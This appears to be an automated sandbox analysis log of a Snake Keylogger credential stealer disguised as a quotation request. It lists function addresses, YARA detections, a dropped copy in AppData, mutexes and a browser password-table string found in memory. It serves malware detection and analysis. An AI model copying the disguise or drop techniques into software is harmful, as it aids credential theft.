Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05975770 9_2_05975770
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597F778 9_2_0597F778
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05971E98 9_2_05971E98
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05971EA8 9_2_05971EA8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05974ED0 9_2_05974ED0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05974EC0 9_2_05974EC0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05974610 9_2_05974610
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05974620 9_2_05974620
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597EE57 9_2_0597EE57
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976E72 9_2_05976E72
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976E70 9_2_05976E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597CE78 9_2_0597CE78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597CE67 9_2_0597CE67
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597EE68 9_2_0597EE68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05971190 9_2_05971190
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059711A0 9_2_059711A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597E9D8 9_2_0597E9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597C9D8 9_2_0597C9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597E9C8 9_2_0597E9C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597C9E8 9_2_0597C9E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597A938 9_2_0597A938
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597A928 9_2_0597A928
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597C0B7 9_2_0597C0B7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059738B8 9_2_059738B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597E0B8 9_2_0597E0B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597E0A7 9_2_0597E0A7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597C0C8 9_2_0597C0C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059708F0 9_2_059708F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059708E0 9_2_059708E0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05973007 9_2_05973007
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05970006 9_2_05970006
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05973008 9_2_05973008
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976030 9_2_05976030
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976022 9_2_05976022
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05970040 9_2_05970040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05972BB0 9_2_05972BB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05972BA0 9_2_05972BA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05975BD8 9_2_05975BD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597531A 9_2_0597531A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597B318 9_2_0597B318
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597B307 9_2_0597B307
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05972300 9_2_05972300
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597D308 9_2_0597D308
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05975328 9_2_05975328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05977B69 9_2_05977B69
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059772B8 9_2_059772B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059772C8 9_2_059772C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597D2F7 9_2_0597D2F7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_059722F0 9_2_059722F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597F2F8 9_2_0597F2F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_0597F2E7 9_2_0597F2E7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05976A18 9_2_05976A18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05971A50 9_2_05971A50
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05971A41 9_2_05971A41
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05974A78 9_2_05974A78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_05974A68 9_2_05974A68
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_00BDD51C 11_2_00BDD51C
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069AC1F0 11_2_069AC1F0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A5798 11_2_069A5798
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A7278 11_2_069A7278
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A5360 11_2_069A5360
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A6E40 11_2_069A6E40
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A4F28 11_2_069A4F28
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166C146 14_2_0166C146
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_01667118 14_2_01667118
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166A088 14_2_0166A088
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_01665362 14_2_01665362
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166D278 14_2_0166D278
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166C468 14_2_0166C468
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166C738 14_2_0166C738
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_016669A0 14_2_016669A0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166E988 14_2_0166E988
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_01663B8C 14_2_01663B8C
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166CA08 14_2_0166CA08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166CCD8 14_2_0166CCD8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166CFAA 14_2_0166CFAA
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166F961 14_2_0166F961
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_0166E97A 14_2_0166E97A
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_016629EC 14_2_016629EC
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_01663AA1 14_2_01663AA1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_01663E09 14_2_01663E09
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB1E80 14_2_06DB1E80
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB17A0 14_2_06DB17A0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0B30 14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9C70 14_2_06DB9C70
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBFC68 14_2_06DBFC68
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBF810 14_2_06DBF810
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB5028 14_2_06DB5028
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9548 14_2_06DB9548
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB2968 14_2_06DB2968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEAF8 14_2_06DBEAF8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE6B0 14_2_06DBE6B0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE6AE 14_2_06DBE6AE
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE258 14_2_06DBE258
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE249 14_2_06DBE249
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB1E70 14_2_06DB1E70
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBDE00 14_2_06DBDE00
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9BFB 14_2_06DB9BFB
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB8B91 14_2_06DB8B91
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB178F 14_2_06DB178F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBF3B8 14_2_06DBF3B8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB8BA0 14_2_06DB8BA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEF51 14_2_06DBEF51
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEF60 14_2_06DBEF60
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEB08 14_2_06DBEB08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9328 14_2_06DB9328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0B20 14_2_06DB0B20
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD0F8 14_2_06DBD0F8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBCCA0 14_2_06DBCCA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0040 14_2_06DB0040
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB501F 14_2_06DB501F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBF801 14_2_06DBF801
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0007 14_2_06DB0007
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBDDFE 14_2_06DBDDFE
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD999 14_2_06DBD999
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD9A8 14_2_06DBD9A8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD550 14_2_06DBD550
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD540 14_2_06DBD540
Sample file is different than original file name gathered from version info
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118483464.0000000006F90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000000.2057334200.0000000000692000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2112009646.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118838113.0000000007730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4515200414.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000441000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Binary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Uses 32bit PE files
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jnqeRRexnD.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.AddAccessRule
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Mutant created: \Sessions\1\BaseNamedObjects\XLczWKrNQSJhyTchb
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File created: C:\Users\user\AppData\Local\Temp\tmp2F66.tmp Jump to behavior
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000003065000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003343000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
